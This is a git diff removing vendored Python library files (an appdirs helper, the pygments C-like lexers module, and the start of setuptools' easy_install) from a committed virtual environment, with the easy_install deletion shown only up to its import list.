- "CSIDL_COMMON_APPDATA": 35, - "CSIDL_LOCAL_APPDATA": 28, - }[csidl_name] - - buf = ctypes.create_unicode_buffer(1024) - ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf) - - # Downgrade to short path name if have highbit chars. See - # . 
- has_high_char = False - for c in buf: - if ord(c) > 255: - has_high_char = True - break - if has_high_char: - buf2 = ctypes.create_unicode_buffer(1024) - if ctypes.windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024): - buf = buf2 - - return buf.value - -def _get_win_folder_with_jna(csidl_name): - import array - from com.sun import jna - from com.sun.jna.platform import win32 - - buf_size = win32.WinDef.MAX_PATH * 2 - buf = array.zeros('c', buf_size) - shell = win32.Shell32.INSTANCE - shell.SHGetFolderPath(None, getattr(win32.ShlObj, csidl_name), None, win32.ShlObj.SHGFP_TYPE_CURRENT, buf) - dir = jna.Native.toString(buf.tostring()).rstrip("\0") - - # Downgrade to short path name if have highbit chars. See - # . - has_high_char = False - for c in dir: - if ord(c) > 255: - has_high_char = True - break - if has_high_char: - buf = array.zeros('c', buf_size) - kernel = win32.Kernel32.INSTANCE - if kernel.GetShortPathName(dir, buf, buf_size): - dir = jna.Native.toString(buf.tostring()).rstrip("\0") - - return dir - -if system == "win32": - try: - import win32com.shell - _get_win_folder = _get_win_folder_with_pywin32 - except ImportError: - try: - from ctypes import windll - _get_win_folder = _get_win_folder_with_ctypes - except ImportError: - try: - import com.sun.jna - _get_win_folder = _get_win_folder_with_jna - except ImportError: - _get_win_folder = _get_win_folder_from_registry - - -#---- self test code - -if __name__ == "__main__": - appname = "MyApp" - appauthor = "MyCompany" - - props = ("user_data_dir", - "user_config_dir", - "user_cache_dir", - "user_state_dir", - "user_log_dir", - "site_data_dir", - "site_config_dir") - - print("-- app dirs %s --" % __version__) - - print("-- app dirs (with optional 'version')") - dirs = AppDirs(appname, appauthor, version="1.0") - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) - - print("\n-- app dirs (without optional 'version')") - dirs = AppDirs(appname, appauthor) - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) - - print("\n-- app dirs (without optional 'appauthor')") - dirs = AppDirs(appname) - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) - - print("\n-- app dirs (with disabled 'appauthor')") - dirs = AppDirs(appname, appauthor=False) - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/c_like.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/c_like.py deleted file mode 100644 index a7379c9bb2a45903db589d13e36f6dc21548a37d..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/c_like.py +++ /dev/null @@ -1,666 +0,0 @@ -""" - pygments.lexers.c_like - ~~~~~~~~~~~~~~~~~~~~~~ - - Lexers for other C-like languages. - - :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -import re - -from pygments.lexer import RegexLexer, include, bygroups, inherit, words, \ - default -from pygments.token import Text, Comment, Operator, Keyword, Name, String, \ - Number, Punctuation, Whitespace - -from pygments.lexers.c_cpp import CLexer, CppLexer -from pygments.lexers import _mql_builtins - -__all__ = ['PikeLexer', 'NesCLexer', 'ClayLexer', 'ECLexer', 'ValaLexer', - 'CudaLexer', 'SwigLexer', 'MqlLexer', 'ArduinoLexer', 'CharmciLexer', - 'OmgIdlLexer'] - - -class PikeLexer(CppLexer): - """ - For `Pike `_ source code. - - .. 
versionadded:: 2.0 - """ - name = 'Pike' - aliases = ['pike'] - filenames = ['*.pike', '*.pmod'] - mimetypes = ['text/x-pike'] - - tokens = { - 'statements': [ - (words(( - 'catch', 'new', 'private', 'protected', 'public', 'gauge', - 'throw', 'throws', 'class', 'interface', 'implement', 'abstract', - 'extends', 'from', 'this', 'super', 'constant', 'final', 'static', - 'import', 'use', 'extern', 'inline', 'proto', 'break', 'continue', - 'if', 'else', 'for', 'while', 'do', 'switch', 'case', 'as', 'in', - 'version', 'return', 'true', 'false', 'null', - '__VERSION__', '__MAJOR__', '__MINOR__', '__BUILD__', '__REAL_VERSION__', - '__REAL_MAJOR__', '__REAL_MINOR__', '__REAL_BUILD__', '__DATE__', '__TIME__', - '__FILE__', '__DIR__', '__LINE__', '__AUTO_BIGNUM__', '__NT__', '__PIKE__', - '__amigaos__', '_Pragma', 'static_assert', 'defined', 'sscanf'), suffix=r'\b'), - Keyword), - (r'(bool|int|long|float|short|double|char|string|object|void|mapping|' - r'array|multiset|program|function|lambda|mixed|' - r'[a-z_][a-z0-9_]*_t)\b', - Keyword.Type), - (r'(class)(\s+)', bygroups(Keyword, Whitespace), 'classname'), - (r'[~!%^&*+=|?:<>/@-]', Operator), - inherit, - ], - 'classname': [ - (r'[a-zA-Z_]\w*', Name.Class, '#pop'), - # template specification - (r'\s*(?=>)', Whitespace, '#pop'), - ], - } - - -class NesCLexer(CLexer): - """ - For `nesC `_ source code with preprocessor - directives. - - .. versionadded:: 2.0 - """ - name = 'nesC' - aliases = ['nesc'] - filenames = ['*.nc'] - mimetypes = ['text/x-nescsrc'] - - tokens = { - 'statements': [ - (words(( - 'abstract', 'as', 'async', 'atomic', 'call', 'command', 'component', - 'components', 'configuration', 'event', 'extends', 'generic', - 'implementation', 'includes', 'interface', 'module', 'new', 'norace', - 'post', 'provides', 'signal', 'task', 'uses'), suffix=r'\b'), - Keyword), - (words(('nx_struct', 'nx_union', 'nx_int8_t', 'nx_int16_t', 'nx_int32_t', - 'nx_int64_t', 'nx_uint8_t', 'nx_uint16_t', 'nx_uint32_t', - 'nx_uint64_t'), suffix=r'\b'), - Keyword.Type), - inherit, - ], - } - - -class ClayLexer(RegexLexer): - """ - For `Clay `_ source. - - .. versionadded:: 2.0 - """ - name = 'Clay' - filenames = ['*.clay'] - aliases = ['clay'] - mimetypes = ['text/x-clay'] - tokens = { - 'root': [ - (r'\s+', Whitespace), - (r'//.*?$', Comment.Single), - (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline), - (r'\b(public|private|import|as|record|variant|instance' - r'|define|overload|default|external|alias' - r'|rvalue|ref|forward|inline|noinline|forceinline' - r'|enum|var|and|or|not|if|else|goto|return|while' - r'|switch|case|break|continue|for|in|true|false|try|catch|throw' - r'|finally|onerror|staticassert|eval|when|newtype' - r'|__FILE__|__LINE__|__COLUMN__|__ARG__' - r')\b', Keyword), - (r'[~!%^&*+=|:<>/-]', Operator), - (r'[#(){}\[\],;.]', Punctuation), - (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), - (r'\d+[LlUu]*', Number.Integer), - (r'\b(true|false)\b', Name.Builtin), - (r'(?i)[a-z_?][\w?]*', Name), - (r'"""', String, 'tdqs'), - (r'"', String, 'dqs'), - ], - 'strings': [ - (r'(?i)\\(x[0-9a-f]{2}|.)', String.Escape), - (r'[^\\"]+', String), - ], - 'nl': [ - (r'\n', String), - ], - 'dqs': [ - (r'"', String, '#pop'), - include('strings'), - ], - 'tdqs': [ - (r'"""', String, '#pop'), - include('strings'), - include('nl'), - ], - } - - -class ECLexer(CLexer): - """ - For eC source code with preprocessor directives. - - .. 
versionadded:: 1.5 - """ - name = 'eC' - aliases = ['ec'] - filenames = ['*.ec', '*.eh'] - mimetypes = ['text/x-echdr', 'text/x-ecsrc'] - - tokens = { - 'statements': [ - (words(( - 'virtual', 'class', 'private', 'public', 'property', 'import', - 'delete', 'new', 'new0', 'renew', 'renew0', 'define', 'get', - 'set', 'remote', 'dllexport', 'dllimport', 'stdcall', 'subclass', - '__on_register_module', 'namespace', 'using', 'typed_object', - 'any_object', 'incref', 'register', 'watch', 'stopwatching', 'firewatchers', - 'watchable', 'class_designer', 'class_fixed', 'class_no_expansion', 'isset', - 'class_default_property', 'property_category', 'class_data', - 'class_property', 'thisclass', 'dbtable', 'dbindex', - 'database_open', 'dbfield'), suffix=r'\b'), Keyword), - (words(('uint', 'uint16', 'uint32', 'uint64', 'bool', 'byte', - 'unichar', 'int64'), suffix=r'\b'), - Keyword.Type), - (r'(class)(\s+)', bygroups(Keyword, Whitespace), 'classname'), - (r'(null|value|this)\b', Name.Builtin), - inherit, - ] - } - - -class ValaLexer(RegexLexer): - """ - For Vala source code with preprocessor directives. - - .. versionadded:: 1.1 - """ - name = 'Vala' - aliases = ['vala', 'vapi'] - filenames = ['*.vala', '*.vapi'] - mimetypes = ['text/x-vala'] - - tokens = { - 'whitespace': [ - (r'^\s*#if\s+0', Comment.Preproc, 'if0'), - (r'\n', Whitespace), - (r'\s+', Whitespace), - (r'\\\n', Text), # line continuation - (r'//(\n|(.|\n)*?[^\\]\n)', Comment.Single), - (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline), - ], - 'statements': [ - (r'[L@]?"', String, 'string'), - (r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", - String.Char), - (r'(?s)""".*?"""', String), # verbatim strings - (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[lL]?', Number.Float), - (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), - (r'0x[0-9a-fA-F]+[Ll]?', Number.Hex), - (r'0[0-7]+[Ll]?', Number.Oct), - (r'\d+[Ll]?', Number.Integer), - (r'[~!%^&*+=|?:<>/-]', Operator), - (r'(\[)(Compact|Immutable|(?:Boolean|Simple)Type)(\])', - bygroups(Punctuation, Name.Decorator, Punctuation)), - # TODO: "correctly" parse complex code attributes - (r'(\[)(CCode|(?:Integer|Floating)Type)', - bygroups(Punctuation, Name.Decorator)), - (r'[()\[\],.]', Punctuation), - (words(( - 'as', 'base', 'break', 'case', 'catch', 'construct', 'continue', - 'default', 'delete', 'do', 'else', 'enum', 'finally', 'for', - 'foreach', 'get', 'if', 'in', 'is', 'lock', 'new', 'out', 'params', - 'return', 'set', 'sizeof', 'switch', 'this', 'throw', 'try', - 'typeof', 'while', 'yield'), suffix=r'\b'), - Keyword), - (words(( - 'abstract', 'const', 'delegate', 'dynamic', 'ensures', 'extern', - 'inline', 'internal', 'override', 'owned', 'private', 'protected', - 'public', 'ref', 'requires', 'signal', 'static', 'throws', 'unowned', - 'var', 'virtual', 'volatile', 'weak', 'yields'), suffix=r'\b'), - Keyword.Declaration), - (r'(namespace|using)(\s+)', bygroups(Keyword.Namespace, Whitespace), - 'namespace'), - (r'(class|errordomain|interface|struct)(\s+)', - bygroups(Keyword.Declaration, Whitespace), 'class'), - (r'(\.)([a-zA-Z_]\w*)', - bygroups(Operator, Name.Attribute)), - # void is an actual keyword, others are in glib-2.0.vapi - (words(( - 'void', 'bool', 'char', 'double', 'float', 'int', 'int8', 'int16', - 'int32', 'int64', 'long', 'short', 'size_t', 'ssize_t', 'string', - 'time_t', 'uchar', 'uint', 'uint8', 'uint16', 'uint32', 'uint64', - 'ulong', 'unichar', 'ushort'), suffix=r'\b'), - Keyword.Type), - (r'(true|false|null)\b', Name.Builtin), - (r'[a-zA-Z_]\w*', Name), - ], - 
'root': [ - include('whitespace'), - default('statement'), - ], - 'statement': [ - include('whitespace'), - include('statements'), - ('[{}]', Punctuation), - (';', Punctuation, '#pop'), - ], - 'string': [ - (r'"', String, '#pop'), - (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), - (r'[^\\"\n]+', String), # all other characters - (r'\\\n', String), # line continuation - (r'\\', String), # stray backslash - ], - 'if0': [ - (r'^\s*#if.*?(?`_ - source. - - .. versionadded:: 1.6 - """ - name = 'CUDA' - filenames = ['*.cu', '*.cuh'] - aliases = ['cuda', 'cu'] - mimetypes = ['text/x-cuda'] - - function_qualifiers = {'__device__', '__global__', '__host__', - '__noinline__', '__forceinline__'} - variable_qualifiers = {'__device__', '__constant__', '__shared__', - '__restrict__'} - vector_types = {'char1', 'uchar1', 'char2', 'uchar2', 'char3', 'uchar3', - 'char4', 'uchar4', 'short1', 'ushort1', 'short2', 'ushort2', - 'short3', 'ushort3', 'short4', 'ushort4', 'int1', 'uint1', - 'int2', 'uint2', 'int3', 'uint3', 'int4', 'uint4', 'long1', - 'ulong1', 'long2', 'ulong2', 'long3', 'ulong3', 'long4', - 'ulong4', 'longlong1', 'ulonglong1', 'longlong2', - 'ulonglong2', 'float1', 'float2', 'float3', 'float4', - 'double1', 'double2', 'dim3'} - variables = {'gridDim', 'blockIdx', 'blockDim', 'threadIdx', 'warpSize'} - functions = {'__threadfence_block', '__threadfence', '__threadfence_system', - '__syncthreads', '__syncthreads_count', '__syncthreads_and', - '__syncthreads_or'} - execution_confs = {'<<<', '>>>'} - - def get_tokens_unprocessed(self, text, stack=('root',)): - for index, token, value in CLexer.get_tokens_unprocessed(self, text, stack): - if token is Name: - if value in self.variable_qualifiers: - token = Keyword.Type - elif value in self.vector_types: - token = Keyword.Type - elif value in self.variables: - token = Name.Builtin - elif value in self.execution_confs: - token = Keyword.Pseudo - elif value in self.function_qualifiers: - token = Keyword.Reserved - elif value in self.functions: - token = Name.Function - yield index, token, value - - -class SwigLexer(CppLexer): - """ - For `SWIG `_ source code. - - .. 
versionadded:: 2.0 - """ - name = 'SWIG' - aliases = ['swig'] - filenames = ['*.swg', '*.i'] - mimetypes = ['text/swig'] - priority = 0.04 # Lower than C/C++ and Objective C/C++ - - tokens = { - 'root': [ - # Match it here so it won't be matched as a function in the rest of root - (r'\$\**\&?\w+', Name), - inherit - ], - 'statements': [ - # SWIG directives - (r'(%[a-z_][a-z0-9_]*)', Name.Function), - # Special variables - (r'\$\**\&?\w+', Name), - # Stringification / additional preprocessor directives - (r'##*[a-zA-Z_]\w*', Comment.Preproc), - inherit, - ], - } - - # This is a far from complete set of SWIG directives - swig_directives = { - # Most common directives - '%apply', '%define', '%director', '%enddef', '%exception', '%extend', - '%feature', '%fragment', '%ignore', '%immutable', '%import', '%include', - '%inline', '%insert', '%module', '%newobject', '%nspace', '%pragma', - '%rename', '%shared_ptr', '%template', '%typecheck', '%typemap', - # Less common directives - '%arg', '%attribute', '%bang', '%begin', '%callback', '%catches', '%clear', - '%constant', '%copyctor', '%csconst', '%csconstvalue', '%csenum', - '%csmethodmodifiers', '%csnothrowexception', '%default', '%defaultctor', - '%defaultdtor', '%defined', '%delete', '%delobject', '%descriptor', - '%exceptionclass', '%exceptionvar', '%extend_smart_pointer', '%fragments', - '%header', '%ifcplusplus', '%ignorewarn', '%implicit', '%implicitconv', - '%init', '%javaconst', '%javaconstvalue', '%javaenum', '%javaexception', - '%javamethodmodifiers', '%kwargs', '%luacode', '%mutable', '%naturalvar', - '%nestedworkaround', '%perlcode', '%pythonabc', '%pythonappend', - '%pythoncallback', '%pythoncode', '%pythondynamic', '%pythonmaybecall', - '%pythonnondynamic', '%pythonprepend', '%refobject', '%shadow', '%sizeof', - '%trackobjects', '%types', '%unrefobject', '%varargs', '%warn', - '%warnfilter'} - - def analyse_text(text): - rv = 0 - # Search for SWIG directives, which are conventionally at the beginning of - # a line. The probability of them being within a line is low, so let another - # lexer win in this case. - matches = re.findall(r'^\s*(%[a-z_][a-z0-9_]*)', text, re.M) - for m in matches: - if m in SwigLexer.swig_directives: - rv = 0.98 - break - else: - rv = 0.91 # Fraction higher than MatlabLexer - return rv - - -class MqlLexer(CppLexer): - """ - For `MQL4 `_ and - `MQL5 `_ source code. - - .. versionadded:: 2.0 - """ - name = 'MQL' - aliases = ['mql', 'mq4', 'mq5', 'mql4', 'mql5'] - filenames = ['*.mq4', '*.mq5', '*.mqh'] - mimetypes = ['text/x-mql'] - - tokens = { - 'statements': [ - (words(_mql_builtins.keywords, suffix=r'\b'), Keyword), - (words(_mql_builtins.c_types, suffix=r'\b'), Keyword.Type), - (words(_mql_builtins.types, suffix=r'\b'), Name.Function), - (words(_mql_builtins.constants, suffix=r'\b'), Name.Constant), - (words(_mql_builtins.colors, prefix='(clr)?', suffix=r'\b'), - Name.Constant), - inherit, - ], - } - - -class ArduinoLexer(CppLexer): - """ - For `Arduino(tm) `_ source. - - This is an extension of the CppLexer, as the Arduino® Language is a superset - of C++ - - .. 
versionadded:: 2.1 - """ - - name = 'Arduino' - aliases = ['arduino'] - filenames = ['*.ino'] - mimetypes = ['text/x-arduino'] - - # Language sketch main structure functions - structure = {'setup', 'loop'} - - # Language operators - operators = {'not', 'or', 'and', 'xor'} - - # Language 'variables' - variables = { - 'DIGITAL_MESSAGE', 'FIRMATA_STRING', 'ANALOG_MESSAGE', 'REPORT_DIGITAL', - 'REPORT_ANALOG', 'INPUT_PULLUP', 'SET_PIN_MODE', 'INTERNAL2V56', 'SYSTEM_RESET', - 'LED_BUILTIN', 'INTERNAL1V1', 'SYSEX_START', 'INTERNAL', 'EXTERNAL', 'HIGH', - 'LOW', 'INPUT', 'OUTPUT', 'INPUT_PULLUP', 'LED_BUILTIN', 'true', 'false', - 'void', 'boolean', 'char', 'unsigned char', 'byte', 'int', 'unsigned int', - 'word', 'long', 'unsigned long', 'short', 'float', 'double', 'string', 'String', - 'array', 'static', 'volatile', 'const', 'boolean', 'byte', 'word', 'string', - 'String', 'array', 'int', 'float', 'private', 'char', 'virtual', 'operator', - 'sizeof', 'uint8_t', 'uint16_t', 'uint32_t', 'uint64_t', 'int8_t', 'int16_t', - 'int32_t', 'int64_t', 'dynamic_cast', 'typedef', 'const_cast', 'const', - 'struct', 'static_cast', 'union', 'unsigned', 'long', 'volatile', 'static', - 'protected', 'bool', 'public', 'friend', 'auto', 'void', 'enum', 'extern', - 'class', 'short', 'reinterpret_cast', 'double', 'register', 'explicit', - 'signed', 'inline', 'delete', '_Bool', 'complex', '_Complex', '_Imaginary', - 'atomic_bool', 'atomic_char', 'atomic_schar', 'atomic_uchar', 'atomic_short', - 'atomic_ushort', 'atomic_int', 'atomic_uint', 'atomic_long', 'atomic_ulong', - 'atomic_llong', 'atomic_ullong', 'PROGMEM'} - - # Language shipped functions and class ( ) - functions = { - 'KeyboardController', 'MouseController', 'SoftwareSerial', 'EthernetServer', - 'EthernetClient', 'LiquidCrystal', 'RobotControl', 'GSMVoiceCall', - 'EthernetUDP', 'EsploraTFT', 'HttpClient', 'RobotMotor', 'WiFiClient', - 'GSMScanner', 'FileSystem', 'Scheduler', 'GSMServer', 'YunClient', 'YunServer', - 'IPAddress', 'GSMClient', 'GSMModem', 'Keyboard', 'Ethernet', 'Console', - 'GSMBand', 'Esplora', 'Stepper', 'Process', 'WiFiUDP', 'GSM_SMS', 'Mailbox', - 'USBHost', 'Firmata', 'PImage', 'Client', 'Server', 'GSMPIN', 'FileIO', - 'Bridge', 'Serial', 'EEPROM', 'Stream', 'Mouse', 'Audio', 'Servo', 'File', - 'Task', 'GPRS', 'WiFi', 'Wire', 'TFT', 'GSM', 'SPI', 'SD', - 'runShellCommandAsynchronously', 'analogWriteResolution', - 'retrieveCallingNumber', 'printFirmwareVersion', 'analogReadResolution', - 'sendDigitalPortPair', 'noListenOnLocalhost', 'readJoystickButton', - 'setFirmwareVersion', 'readJoystickSwitch', 'scrollDisplayRight', - 'getVoiceCallStatus', 'scrollDisplayLeft', 'writeMicroseconds', - 'delayMicroseconds', 'beginTransmission', 'getSignalStrength', - 'runAsynchronously', 'getAsynchronously', 'listenOnLocalhost', - 'getCurrentCarrier', 'readAccelerometer', 'messageAvailable', - 'sendDigitalPorts', 'lineFollowConfig', 'countryNameWrite', 'runShellCommand', - 'readStringUntil', 'rewindDirectory', 'readTemperature', 'setClockDivider', - 'readLightSensor', 'endTransmission', 'analogReference', 'detachInterrupt', - 'countryNameRead', 'attachInterrupt', 'encryptionType', 'readBytesUntil', - 'robotNameWrite', 'readMicrophone', 'robotNameRead', 'cityNameWrite', - 'userNameWrite', 'readJoystickY', 'readJoystickX', 'mouseReleased', - 'openNextFile', 'scanNetworks', 'noInterrupts', 'digitalWrite', 'beginSpeaker', - 'mousePressed', 'isActionDone', 'mouseDragged', 'displayLogos', 'noAutoscroll', - 'addParameter', 'remoteNumber', 'getModifiers', 
'keyboardRead', 'userNameRead', - 'waitContinue', 'processInput', 'parseCommand', 'printVersion', 'readNetworks', - 'writeMessage', 'blinkVersion', 'cityNameRead', 'readMessage', 'setDataMode', - 'parsePacket', 'isListening', 'setBitOrder', 'beginPacket', 'isDirectory', - 'motorsWrite', 'drawCompass', 'digitalRead', 'clearScreen', 'serialEvent', - 'rightToLeft', 'setTextSize', 'leftToRight', 'requestFrom', 'keyReleased', - 'compassRead', 'analogWrite', 'interrupts', 'WiFiServer', 'disconnect', - 'playMelody', 'parseFloat', 'autoscroll', 'getPINUsed', 'setPINUsed', - 'setTimeout', 'sendAnalog', 'readSlider', 'analogRead', 'beginWrite', - 'createChar', 'motorsStop', 'keyPressed', 'tempoWrite', 'readButton', - 'subnetMask', 'debugPrint', 'macAddress', 'writeGreen', 'randomSeed', - 'attachGPRS', 'readString', 'sendString', 'remotePort', 'releaseAll', - 'mouseMoved', 'background', 'getXChange', 'getYChange', 'answerCall', - 'getResult', 'voiceCall', 'endPacket', 'constrain', 'getSocket', 'writeJSON', - 'getButton', 'available', 'connected', 'findUntil', 'readBytes', 'exitValue', - 'readGreen', 'writeBlue', 'startLoop', 'IPAddress', 'isPressed', 'sendSysex', - 'pauseMode', 'gatewayIP', 'setCursor', 'getOemKey', 'tuneWrite', 'noDisplay', - 'loadImage', 'switchPIN', 'onRequest', 'onReceive', 'changePIN', 'playFile', - 'noBuffer', 'parseInt', 'overflow', 'checkPIN', 'knobRead', 'beginTFT', - 'bitClear', 'updateIR', 'bitWrite', 'position', 'writeRGB', 'highByte', - 'writeRed', 'setSpeed', 'readBlue', 'noStroke', 'remoteIP', 'transfer', - 'shutdown', 'hangCall', 'beginSMS', 'endWrite', 'attached', 'maintain', - 'noCursor', 'checkReg', 'checkPUK', 'shiftOut', 'isValid', 'shiftIn', 'pulseIn', - 'connect', 'println', 'localIP', 'pinMode', 'getIMEI', 'display', 'noBlink', - 'process', 'getBand', 'running', 'beginSD', 'drawBMP', 'lowByte', 'setBand', - 'release', 'bitRead', 'prepare', 'pointTo', 'readRed', 'setMode', 'noFill', - 'remove', 'listen', 'stroke', 'detach', 'attach', 'noTone', 'exists', 'buffer', - 'height', 'bitSet', 'circle', 'config', 'cursor', 'random', 'IRread', 'setDNS', - 'endSMS', 'getKey', 'micros', 'millis', 'begin', 'print', 'write', 'ready', - 'flush', 'width', 'isPIN', 'blink', 'clear', 'press', 'mkdir', 'rmdir', 'close', - 'point', 'yield', 'image', 'BSSID', 'click', 'delay', 'read', 'text', 'move', - 'peek', 'beep', 'rect', 'line', 'open', 'seek', 'fill', 'size', 'turn', 'stop', - 'home', 'find', 'step', 'tone', 'sqrt', 'RSSI', 'SSID', 'end', 'bit', 'tan', - 'cos', 'sin', 'pow', 'map', 'abs', 'max', 'min', 'get', 'run', 'put', - 'isAlphaNumeric', 'isAlpha', 'isAscii', 'isWhitespace', 'isControl', 'isDigit', - 'isGraph', 'isLowerCase', 'isPrintable', 'isPunct', 'isSpace', 'isUpperCase', - 'isHexadecimalDigit'} - - # do not highlight - suppress_highlight = { - 'namespace', 'template', 'mutable', 'using', 'asm', 'typeid', - 'typename', 'this', 'alignof', 'constexpr', 'decltype', 'noexcept', - 'static_assert', 'thread_local', 'restrict'} - - def get_tokens_unprocessed(self, text, stack=('root',)): - for index, token, value in CppLexer.get_tokens_unprocessed(self, text, stack): - if value in self.structure: - yield index, Name.Builtin, value - elif value in self.operators: - yield index, Operator, value - elif value in self.variables: - yield index, Keyword.Reserved, value - elif value in self.suppress_highlight: - yield index, Name, value - elif value in self.functions: - yield index, Name.Function, value - else: - yield index, token, value - - -class CharmciLexer(CppLexer): - """ - 
For `Charm++ `_ interface files (.ci). - - .. versionadded:: 2.4 - """ - - name = 'Charmci' - aliases = ['charmci'] - filenames = ['*.ci'] - - mimetypes = [] - - tokens = { - 'keywords': [ - (r'(module)(\s+)', bygroups(Keyword, Text), 'classname'), - (words(('mainmodule', 'mainchare', 'chare', 'array', 'group', - 'nodegroup', 'message', 'conditional')), Keyword), - (words(('entry', 'aggregate', 'threaded', 'sync', 'exclusive', - 'nokeep', 'notrace', 'immediate', 'expedited', 'inline', - 'local', 'python', 'accel', 'readwrite', 'writeonly', - 'accelblock', 'memcritical', 'packed', 'varsize', - 'initproc', 'initnode', 'initcall', 'stacksize', - 'createhere', 'createhome', 'reductiontarget', 'iget', - 'nocopy', 'mutable', 'migratable', 'readonly')), Keyword), - inherit, - ], - } - - -class OmgIdlLexer(CLexer): - """ - Lexer for Object Management Group Interface Definition Language. - - .. versionadded:: 2.9 - """ - - name = 'OMG Interface Definition Language' - url = 'https://www.omg.org/spec/IDL/About-IDL/' - aliases = ['omg-idl'] - filenames = ['*.idl', '*.pidl'] - mimetypes = [] - - scoped_name = r'((::)?\w+)+' - - tokens = { - 'values': [ - (words(('true', 'false'), prefix=r'(?i)', suffix=r'\b'), Number), - (r'([Ll]?)(")', bygroups(String.Affix, String.Double), 'string'), - (r'([Ll]?)(\')(\\[^\']+)(\')', - bygroups(String.Affix, String.Char, String.Escape, String.Char)), - (r'([Ll]?)(\')(\\\')(\')', - bygroups(String.Affix, String.Char, String.Escape, String.Char)), - (r'([Ll]?)(\'.\')', bygroups(String.Affix, String.Char)), - (r'[+-]?\d+(\.\d*)?[Ee][+-]?\d+', Number.Float), - (r'[+-]?(\d+\.\d*)|(\d*\.\d+)([Ee][+-]?\d+)?', Number.Float), - (r'(?i)[+-]?0x[0-9a-f]+', Number.Hex), - (r'[+-]?[1-9]\d*', Number.Integer), - (r'[+-]?0[0-7]*', Number.Oct), - (r'[\+\-\*\/%^&\|~]', Operator), - (words(('<<', '>>')), Operator), - (scoped_name, Name), - (r'[{};:,<>\[\]]', Punctuation), - ], - 'annotation_params': [ - include('whitespace'), - (r'\(', Punctuation, '#push'), - include('values'), - (r'=', Punctuation), - (r'\)', Punctuation, '#pop'), - ], - 'annotation_params_maybe': [ - (r'\(', Punctuation, 'annotation_params'), - include('whitespace'), - default('#pop'), - ], - 'annotation_appl': [ - (r'@' + scoped_name, Name.Decorator, 'annotation_params_maybe'), - ], - 'enum': [ - include('whitespace'), - (r'[{,]', Punctuation), - (r'\w+', Name.Constant), - include('annotation_appl'), - (r'\}', Punctuation, '#pop'), - ], - 'root': [ - include('whitespace'), - (words(( - 'typedef', 'const', - 'in', 'out', 'inout', 'local', - ), prefix=r'(?i)', suffix=r'\b'), Keyword.Declaration), - (words(( - 'void', 'any', 'native', 'bitfield', - 'unsigned', 'boolean', 'char', 'wchar', 'octet', 'short', 'long', - 'int8', 'uint8', 'int16', 'int32', 'int64', 'uint16', 'uint32', 'uint64', - 'float', 'double', 'fixed', - 'sequence', 'string', 'wstring', 'map', - ), prefix=r'(?i)', suffix=r'\b'), Keyword.Type), - (words(( - '@annotation', 'struct', 'union', 'bitset', 'interface', - 'exception', 'valuetype', 'eventtype', 'component', - ), prefix=r'(?i)', suffix=r'(\s+)(\w+)'), bygroups(Keyword, Whitespace, Name.Class)), - (words(( - 'abstract', 'alias', 'attribute', 'case', 'connector', - 'consumes', 'context', 'custom', 'default', 'emits', 'factory', - 'finder', 'getraises', 'home', 'import', 'manages', 'mirrorport', - 'multiple', 'Object', 'oneway', 'primarykey', 'private', 'port', - 'porttype', 'provides', 'public', 'publishes', 'raises', - 'readonly', 'setraises', 'supports', 'switch', 'truncatable', - 'typeid', 
'typename', 'typeprefix', 'uses', 'ValueBase', - ), prefix=r'(?i)', suffix=r'\b'), Keyword), - (r'(?i)(enum|bitmask)(\s+)(\w+)', - bygroups(Keyword, Whitespace, Name.Class), 'enum'), - (r'(?i)(module)(\s+)(\w+)', - bygroups(Keyword.Namespace, Whitespace, Name.Namespace)), - (r'(\w+)(\s*)(=)', bygroups(Name.Constant, Whitespace, Operator)), - (r'[\(\)]', Punctuation), - include('values'), - include('annotation_appl'), - ], - } diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/setuptools/command/easy_install.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/setuptools/command/easy_install.py deleted file mode 100644 index 5e0f97cfea5484ea1ea139e0f4b8e8553b80b00d..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/setuptools/command/easy_install.py +++ /dev/null @@ -1,2290 +0,0 @@ -""" -Easy Install ------------- - -A tool for doing automatic download/extract/build of distutils-based Python -packages. For detailed documentation, see the accompanying EasyInstall.txt -file, or visit the `EasyInstall home page`__. - -__ https://setuptools.readthedocs.io/en/latest/deprecated/easy_install.html - -""" - -from glob import glob -from distutils.util import get_platform -from distutils.util import convert_path, subst_vars -from distutils.errors import ( - DistutilsArgError, DistutilsOptionError, - DistutilsError, DistutilsPlatformError, -) -from distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS -from distutils import log, dir_util -from distutils.command.build_scripts import first_line_re -from distutils.spawn import find_executable -import sys -import os -import zipimport -import shutil -import tempfile -import zipfile -import re -import stat -import random -import textwrap -import warnings -import site -import struct -import contextlib -import subprocess -import shlex -import io -import configparser - - -from sysconfig import get_config_vars, get_path - -from setuptools import SetuptoolsDeprecationWarning - -from setuptools import Command -from setuptools.sandbox import run_setup -from setuptools.command import setopt -from setuptools.archive_util import unpack_archive -from setuptools.package_index import ( - PackageIndex, parse_requirement_arg, URL_SCHEME, -) -from setuptools.command import bdist_egg, egg_info -from setuptools.wheel import Wheel -from pkg_resources import ( - yield_lines, normalize_path, resource_string, ensure_directory, - get_distribution, find_distributions, Environment, Requirement, - Distribution, PathMetadata, EggMetadata, 